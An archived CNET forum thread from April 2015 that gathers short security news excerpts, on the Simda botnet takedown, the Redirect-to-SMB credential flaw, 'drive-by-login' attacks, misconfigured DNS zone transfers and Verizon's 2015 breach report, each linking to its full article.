Thank you for being a valued part of the CNET community. As of December 1, 2020, the forums are in read-only format. In early 2021, CNET Forums will no longer be available. We are grateful for the participation and advice you have provided to one another over the years.

Thanks,

CNET Support

Alert

NEWS - April 14, 2015

Apr 14, 2015 2:25AM PDT
Botnet that enslaved 770,000 PCs worldwide comes crashing down

"The Simda botnet that menaced 190 countries is no more."

Simda, as the botnet was known, infected an additional 128,000 new computers each month over the past half year, a testament to the stealth of the underlying backdoor trojan and the organization of its creators. The backdoor morphed into a new, undetectable form every few hours, allowing it to stay one step ahead of many antivirus programs. Botnet operators used a variety of methods to infect targets, including exploiting known vulnerabilities in software such as Oracle Java, Adobe Flash, and Microsoft Silverlight.

The exploits were stitched into websites by exploiting SQL injection vulnerabilities and exploit kits such as Blackhole and Styx. Other methods included sending spam and other forms of social engineering. Countries most affected by Simda included the US, with 22 percent of the infections, followed by the UK, Turkey with five percent, and Canada and Russia with four percent.

Continued : http://arstechnica.com/security/2015/04/botnet-that-enslaved-770000-pcs-worldwide-comes-crashing-down/

Related :
Coordinated Takedown Puts End to Simda Botnet
Backdoor bot brains snatched after cops, white hats raid servers
Simda Botnet Expanded over 190 Countries, Controlled from 14 Servers

Discussion is locked

- Collapse -
18-year-old bug can be exploited to steal credentials ..
Apr 14, 2015 2:46AM PDT
of Windows users

A new technique for exploiting an 18-year-old bug in Windows Server Message Block (SMB), which would allow attackers to intercept user credentials, had been uncovered by Cylance researcher Brian Wallace.

SMB is a core component in Windows networking, and can be found - and is enabled by default - in all versions of the Windows OS, including Windows 10.

"Redirect to SMB is a way for attackers to steal valuable user credentials by hijacking communications with legitimate web servers via man-in-the-middle attacks, then sending them to malicious SMB (server message block) servers that force them to spit out the victim's username, domain and hashed password," the researcher explained.

Continued : http://www.net-security.org/secworld.php?id=18210

Related :
Unpatched 18 year-old Windows man-in-the-middle diddle revived
New SMB Flaw Affects All Versions of Windows
- Collapse -
Malicious Actors Use "Drive-by-Login" Technique in ..
Apr 14, 2015 2:46AM PDT
.. Targeted Attacks

High-Tech Bridge has spotted an interesting attack in which the threat actor used what researchers believe is a new vector for delivering malware to a targeted individual.

Dubbed by the security firm "drive-by-login," the technique is similar to drive-by downloads in which malware is delivered to victims when they visit the attacker's website. However, in drive-by-login attacks, the attacker sets up malicious code on a website he knows the victim is going to visit. The malicious code is designed to deliver malware only to the targeted user, not all website visitors.

High-Tech Bridge analyzed such an attack after being alerted by the owner of a medium-size online store in Central Europe. The customer noticed that his website was trying to infect his computer with malware. Initially, researchers believed it might have been a false positive since they didn't see any attempts to deliver malware, but a closer investigation revealed that it was actually a cleverly staged targeted attack.

Continued : http://www.securityweek.com/malicious-actors-use-drive-login-technique-targeted-attacks

Related : Universal backdoor for e-commerce platform lets hackers shop for victims
- Collapse -
US-CERT Warns of Issues With DNS Zone Transfer Requests
Apr 14, 2015 2:46AM PDT

The US-CERT is warning administrators and network operators that a misconfiguration issue with some DNS servers that has been known about for more than 15 years and can give attackers detailed information about DNS zones is coming back around thanks to new scans that show a high number of servers vulnerable to the issue.

The problem is in the way that some DNS servers will respond to zone transfer requests from other servers. Primary DNS servers are set up to replicate specific information about their zones to secondary DNS servers, and if the primary servers don't authenticate the requests they can hand over detailed domain information to an attacker.

Continued : https://threatpost.com/us-cert-warns-of-issues-with-dns-zone-transfer-requests/112225

Related :
Misconfigured DNS Servers Vulnerable to Domain Info Leak
Misconfigured DNS servers may leak domain info, warns US-CERT

- Collapse -
Verizon 2015 DBIR: Don't Sweat Mobile and IoT
Apr 14, 2015 5:29AM PDT

Verizon on Tuesday released its widely anticipated 2015 Data Breach Investigations Report (DBIR), a must read report compiled by Verizon with the support 70 contributing partners, which analyzed 79,790 security incidents and 2,122 confirmed data breaches across 61 different countries.

While the industry is flooded with reports and survey data almost daily, Verizon's annual DBIR is the top "must read" report of the year.

Verizon's 2015 DBIR has expanded its investigation into nine common threat patterns and sizes up the effects of all types of data breaches, from small data disclosures to larger, headline-making events.

Continued : http://www.securityweek.com/verizon-2015-dbir-dont-sweat-mobile-and-iot

Related :
Verizon DBIR: Mobile Devices Not A Factor In Real-World Attacks
Verizon's data breach report can't find any mobile malware - so is it all hype?
Takeaways From the 2015 Verizon Data Breach Investigations Report